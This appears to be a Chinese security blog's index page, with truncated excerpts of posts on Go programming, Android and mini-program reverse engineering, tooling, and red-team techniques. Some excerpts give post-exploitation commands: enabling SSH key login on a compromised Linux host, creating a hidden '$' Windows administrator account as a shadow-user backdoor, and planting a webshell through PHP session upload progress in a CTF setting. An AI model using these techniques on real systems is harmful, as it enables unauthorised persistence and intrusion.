快速掌握GO语言面向对象类的实现
结构体struct1234567891011121314151617181920212223242526272829303132333435363738394041424344package mainimport "fmt"//声明一种行的数据类型 myint, 是int的一个别名type myint int//定义一个结构体type Book struct { title string auth string}func changeBook(book Book) { //传递一个book的副本 book.auth = "666"}func changeBook2(book *Book) { //指针传递 book.auth = "777"}func main() { /* var a myint = 10 fmt.Println("a = ", a) fmt.Printf( ...
无密码Linux主机利用公钥直接连接
0x00 前提
以前的老东西,拿出水一篇
一般是通过 Rce,提权等等情况,拿到目标 linux 的 root 权限
主要是没有密码, hash 跑不出来,机器无法正常出网
就可以去试着正向链接
0x01 首先目标主机,修改目标 Ssh 服务配置启用ssh证书登录,并重启SSH 服务
123echo RSAAuthentication yes >> /etc/ssh/sshd_configecho PubkeyAuthentication yes >> /etc/ssh/sshd_configsystemctl restart sshd
0x02 本地linux上生成密钥1# ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa
注意:这一步最好去一个纯净的Linux生成,因为这个key会暴露你的主机名
12345//找见id_rsa.pub自行拷贝出来ls -al /root/.ssh/cp /root/.ssh/id_rsa.pub /home/xxxx/Desktop///赋于权限chmod 77 ...
权限维持-影子用户后门
0x00 前提水一篇内网东西,主要针对一种情况:抓到 hash 解不开, 又不想 pth, 就想直接登桌面
0x01权限维持-影子用户后门影子账户,古老但有效!
原理代 $ 符号的用户名不会显示出来,仔通导出注册表,并修改F值,克隆账号,再删除账号
效果
net user无法删除,需要删除注册表相关键值;
Windows 的登录界面不显示该用户信息。
0x02 简单实用1ShadowUser.exe admin administrator
可以正常登录,桌面什么也是克隆的administrator的
单纯的创建隐藏用户我们先利用命令创建一个隐藏用户,并将其加入本地管理员组。
12net user test$ Test123456 /addnet localgroup administrators test$ /add
go语言快速掌握语法特色--基本语法
0x00 背景
主要是针对:想快速低成本掌握golang开发人群,主要是讲区别其他语言的特色语法、用法和思想。
最好是已经熟悉了一门后段语言,可以快速的掌握和上手go语言
因为编程思想是想通的,对于已经熟练一门语言的开发者,只要掌握开发这个语言的特性,很快就能上手了。
下面的每个知识点,没有单独去拿出来讲,知识点都是在代码旁边的注释里面,我感觉还是蛮不错的,有代码例子应该很快就能理解
0x01 GO基本语法注意go里面有个很特殊的:每个变量声明之后必须要在后面使用,不允许存在变量声明没有使用的情况,所以下面的代码没有调试通,可以先看看,是不是有变量没有使用。
0x011 基本的函数编写格式:(括号、;)123456789101112package main //程序的包名import ( "fmt" "time")//main函数func main() { //函数的{ 一定是 和函数名在同一行的,否则编译错误 //golang中的表达式,加";", 和不加 都可以,建议是不加 fmt.Pr ...
利用PHP_SESSION_UPLOAD_PROGRESS上传webshell
0x01 环境配置&利用条件
环境分析
session.use_strict_mode默认值为0,此时用户是可以自己定义Session ID的
1我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag
session.upload_progress.prefix由我们构造的session.upload_progress.name值组成,最后被写入sess_文件里。
所以:
这个文件名是PHPSESSID=flag,文件名可控
内容也是可以通过PHP_SESSION_UPLOAD_PROGRESS写入的
如果有文件包含,就可以 getshell
一般情况还需要条件竞争:
12345在默认情况下,session.upload_progress.cleanup是开启的所以要是处理了所有POST数据,它就会清除进度信息,这个文件就没了所以需要使用条件竞争:要在没有处理完post数据的时候就要去触发
0x02 题目这个题是第五空间CTF的一道WEB题
12345678910111213141516 ...
android逆向之frida安装与简单使用Crackmes/Android/Level_01
0x01 在电脑上安装adb安装adb我们要在电脑上通过adb与手机进行交互,所以要先安装adb
1.安装 adbwindows电脑安装adb
12可以通过安装android sdk然后就是 /android sdk/platform-tools/adb.exe
Mac安装命令
1brew cask install android-platform-tools
2.将手机通过数据线连接到电脑上
要设置手机打开usb调试
一般就在 手机设置-关于-开发者选项-允许usb调试 (不同手机不一样,自己找找USB调试)
3.运行adb,在终端输入如下命令,查看连接的设备运行adb命令,查看当前连接设备
1adb devices
显示有device就是连接上了设备
0x02 在电脑上-安装python3windows电脑去官网下载,自己百度安装吧
12注意:高版本的frida 要配合高版本的python我的是 pyhton 3.7.9 和 frida 15.0.15
Mac版本
1brew install [email protected]
0x03 在电脑上安装frida-tools这个其 ...
小程序渗透测试-前端打包调试解密
0x01 用到的环境
node环境
wxappUnpacker
微信开发者工具
网易mumu模拟器(Android6版本)
mt管理器(模拟器中的文件管理工具)
0x02 编译阶段
首先找到小程序的安装包,可以找个手机,点开小程序后,找到手机文件目录, 一般是这样的目录。
1/data/data/com.tencent.mm/MicromMsg/c6dxxxxxxxxxxxxx/appbrand/pkg/*.wxapkg
注:此时必须root
mt管理器
然后自己想办法现在把这些包从手机里导出来(如果很多wxapkg建议清理一下,重启目标小程序。)
0x03 反编译wxapkg获取源文件Github上已经有大神写的node.js版本的,当然也有其它版本的,例如python版本,不用管什么版本的,能用就行了。
GitHub地址:
https://github.com/qwerty472123/wxappUnpacker
进入到下载好的反编译脚本目录下,在node命令窗口中依次安装需要的依赖。
项目中列出来的需要安装的依赖不全,如果报错,看下issues就行了,下面是在我 ...
使用iftop 流量监控 速率监控
0x00 使用iftop 流量监控 速率监控使用iftop对流量监控,对总的发送速率进行监控
0x01 mac 安装 iftop1brew reinstall iftop
注:如果出现403的报错,下载直接失败的情况,建议换homebrew的源,再进行安装
参考 https://blog.csdn.net/god\_zzZ/article/details/119422419
加入软连接1ln -s /usr/local/Cellar/iftop/1.0pre4/sbin/iftop /usr/local/bin/iftop
查看帮助,安装成功
1iftop -h
0x02 简单使用监控 en0 网卡的流量
1sudo iftop -i en0
其他选项设置
123456789101112131415161718192021-i设定监测的网卡,如:# iftop -i eth1-B 以bytes为单位显示流量(默认是bits),如:# iftop -B-n使host信息默认直接都显示IP,如:# iftop -n-N使端口信息默认直接都显示端口号,如: # iftop ...
MAC Brew 国内 换源
mac Brew 国内 换源Brew源
12cd "$(brew --repo)"git remote set-url origin https://mirrors.ustc.edu.cn/brew.git
软件源
1234cd "$(brew --repo)/Library/Taps/homebrew/homebrew-core"git remote set-url origin https://mirrors.ustc.edu.cn/homebrew-core.gitcd "$(brew --repo)"/Library/Taps/homebrew/homebrew-caskgit remote set-url origin https://mirrors.ustc.edu.cn/homebrew-cask.git
Bottles源
12echo 'export HOMEBREW_BOTTLE_DOMAIN=https://mirrors.ustc.edu.cn/homebrew-bottles' ...
关于红队武器库项目介绍
0x00 武器库前后端分离项目:https://github.com/godzeo/ArsenalWeb
本项目是一个红队武器库平台,包含常用的一些红队功能,也会集合一些其他好用的工具到里面
正在开发中…
暂时不全部开源,因为还有很多bug和代码质量有点烂…
开发
前后端分离项目:
后端:采用django+django-rest-framework,
前端采用vue+ElementUI
JWT认证,支持swagger
必要环境
Redis+npm+Python3.7
0x02 组件(功能)
红队最新漏洞共享 (markdown格式)
企业信息收集(前端界面简陋,数据源:企查查)
单个网站漏洞扫描
漏洞扫描 (大规模资产漏扫扫描)
其他系统功能
TODO
缺少一个数据清洗
大规模资产漏扫扫描流程:
根域名收集 (可借助企业信息收集模块)
子域名收集
被动信息收集(fofa,sodan)
IP地址解析
端口指纹扫描 (web-top 20)
WEB服务探测
waf检测
重要应用指纹识别(指纹识别模块)
自建POC扫描(想兼容最新发现goby的poc格 ...